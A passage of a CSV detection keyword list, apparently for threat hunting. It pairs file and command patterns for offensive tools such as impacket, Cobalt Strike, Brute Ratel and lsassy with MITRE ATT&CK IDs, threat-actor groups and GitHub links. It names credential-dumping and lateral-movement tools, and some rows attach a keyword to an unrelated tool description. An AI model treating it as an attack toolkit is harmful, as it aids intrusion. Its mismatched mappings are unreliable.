pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"*imapattack.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*imapattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*imaprelayclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*imaprelayclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*imp_Badger*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. 
The library provides a set of tools as examples of what can be done within the context of this library","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-* *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-*.tar.gz*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket.*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*impacket.*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" +"*'impacket.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket.git*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket.ldap*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket.ntlm*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket.smbconnection*","offensive_tool_keyword","smbcrawler","SmbCrawler is a tool that takes credentials and a list of hosts and crawls through those shares","T1077 - T1021 - T1110 - T1083","TA0002 - TA0008 - TA0009","N/A","N/A","Lateral Movement - Collection","https://github.com/SySS-Research/smbcrawler","1","1","N/A","N/A","2","129","13","2023-05-14T06:48:40Z","2021-06-09T19:27:08Z" +"*impacket/*.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket:latest*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket__init__*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket_findDelegation*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*impacket_rpcdump_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*impacket-atexec*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-dcomexec*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketfile.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*impacket-GetADUsers*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-GetNPUsers*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-getST*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-getTGT*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketldap_shell*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketlogger*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-lookupsid*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketmssqlshell*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-netview*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketntlmrelayx*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketos_ident*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-psexec*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-reg*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-reg*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library","T1071.001 - T1071.002 - T1071.004 - T1071.005 ","TA0005 - TA0006","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","POST Exploitation tools","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketremcomsvc*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketrpcdatabase*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-rpcdump*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-samrdump*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketsecretsdump*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
